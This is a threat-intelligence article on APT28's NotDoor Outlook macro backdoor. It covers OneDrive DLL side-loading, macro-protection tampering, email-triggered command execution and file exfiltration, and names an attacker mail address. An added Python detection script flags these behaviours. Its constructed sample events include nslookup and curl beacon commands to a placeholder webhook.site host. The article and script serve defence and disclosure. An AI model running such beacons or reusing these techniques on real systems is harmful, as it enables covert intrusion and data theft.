The intelligence team at LAB52 (S2 Grupo) has uncovered a sophisticated new backdoor campaign attributed to APT28, the Russian state-linked threat group also known as Fancy Bear. The malware, dubbed NotDoor, exploits Microsoft Outlook macros to create a stealthy foothold inside targeted organizations.
According to LAB52, “APT28… has compromised multiple companies from various sectors in NATO member countries.”
The backdoor was named NotDoor after the recurring word “Nothing” found within its code. It is implemented as a VBA macro for Outlook that constantly monitors incoming emails for a specific trigger word. Once the trigger is detected, the malware activates functions to exfiltrate data, upload files, or execute commands remotely.
APT28 uses a DLL side-loading technique involving the legitimate, signed Microsoft OneDrive.exe binary. The process loads a malicious DLL (SSPICLI.dll) which installs the NotDoor VBA project. To bypass security controls, it also disables multiple macro protections.
As LAB52 explains, “the backdoor will be deployed via the legitimate signed binary Microsoft OneDrive.exe… responsible for installing the VBA backdoor and disabling multiple macro security protections.”
Once executed, the loader runs three Base64-encoded PowerShell commands:
- Copying the backdoor: it copies the malicious file (testtemp.ini) into Outlook’s VBA project folder so that Outlook loads it on startup.
- DNS verification: it runs an nslookup query against a webhook.site domain tied to the victim’s username to confirm the infection.
- HTTP beaconing: it sends a curl request to a webhook.site URL as an additional validation step.
Persistence is then achieved by editing registry keys to enable macros on boot and suppress Outlook dialog messages, making detection less likely.
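As an added example (not LAB52’s code or anything from the report), the following Python turns the loader chain above into three detection rules over Sysmon-style events: OneDrive.exe loading SSPICLI.dll from outside System32, nslookup/curl reaching webhook.site, and a non-Outlook process writing the VBA project file. It assumes the standard Outlook location for that file (%APPDATA%\Microsoft\Outlook\VbaProject.OTM, which the page does not name), and the sample events, the USER path and the webhook id are constructed placeholders.

```python
import ntpath

WEBHOOK_DOMAIN = "webhook.site"
# Outlook keeps its macro project as VbaProject.OTM under %APPDATA%\Microsoft\Outlook
# (standard Outlook behaviour; the page only says "Outlook's VBA project folder").
OUTLOOK_VBA_DIR = "\\microsoft\\outlook\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _name(path):
    return ntpath.basename(path).lower()


def classify(event):
    """Return a finding string for one Sysmon-style event (a dict), or None if benign."""
    kind = event["type"]
    if kind == "ImageLoad":
        loaded = event["loaded"].lower()
        # OneDrive.exe should resolve SSPICLI.dll from System32; any other path is side-loading.
        if (_name(event["image"]) == "onedrive.exe" and _name(loaded) == "sspicli.dll"
                and not loaded.startswith(SYSTEM_DIRS)):
            return "dll-sideload: OneDrive.exe loaded " + event["loaded"]
    elif kind == "ProcessCreate":
        # The loader confirms infection with nslookup and curl against webhook.site.
        if (_name(event["image"]) in ("nslookup.exe", "curl.exe")
                and WEBHOOK_DOMAIN in event["cmdline"].lower()):
            return "infection-check: %s -> %s" % (_name(event["image"]), WEBHOOK_DOMAIN)
    elif kind == "FileCreate":
        target = event["target"].lower()
        # Only Outlook itself should write its own VBA project file.
        if (OUTLOOK_VBA_DIR in target and target.endswith(".otm")
                and _name(event["image"]) != "outlook.exe"):
            return "vba-drop: %s wrote %s" % (_name(event["image"]), event["target"])
    return None


def scan(events):
    """Run every event through classify() and return the list of findings."""
    return [f for f in map(classify, events) if f]


# Constructed sample events (not from the report); USER and PLACEHOLDER-ID are placeholders.
SAMPLE_EVENTS = [
    {"type": "ImageLoad", "image": r"C:\Users\USER\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "loaded": r"C:\Users\USER\AppData\Local\Microsoft\OneDrive\SSPICLI.dll"},
    {"type": "ImageLoad", "image": r"C:\Users\USER\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "loaded": r"C:\Windows\System32\sspicli.dll"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup USER.PLACEHOLDER-ID.webhook.site"},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl https://webhook.site/PLACEHOLDER-ID"},
    {"type": "FileCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\USER\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
    {"type": "FileCreate", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"C:\Users\USER\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The second ImageLoad and the OUTLOOK.EXE write are included as benign controls, so the run should report exactly four findings.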
Once installed, NotDoor leverages Outlook events (Application_MAPILogonComplete and Application_NewMailEx) to activate whenever Outlook starts or a new email arrives. The macro code is heavily obfuscated, with randomized variable names and a custom string encoding method that disguises Base64 as fake encryption.
When triggered by a crafted email—such as one containing the phrase “Daily Report”—NotDoor deletes the message to hide traces, then parses the payload. Commands supported include:
- cmd → Execute commands and return output as attachments.
- cmdno → Execute commands without response.
- dwn → Exfiltrate files via email attachments.
- upl → Upload files to the victim’s machine.
Exfiltrated data is sent as attachments named to mimic legitimate business files such as report, invoice, contract, or photo, with extensions like .pdf, .docx, .xlsx, or .jpg.
If the %TEMP%\Temp folder contains files during startup, the malware sends them to the attacker’s ProtonMail account (a.matti444@proton[.]me) with the subject line “Re: 0”. After transmission, the files are deleted regardless of success, minimizing forensic evidence.
By embedding command-and-control inside Outlook’s trusted environment, NotDoor leverages everyday business communications to evade detection and persist across corporate networks.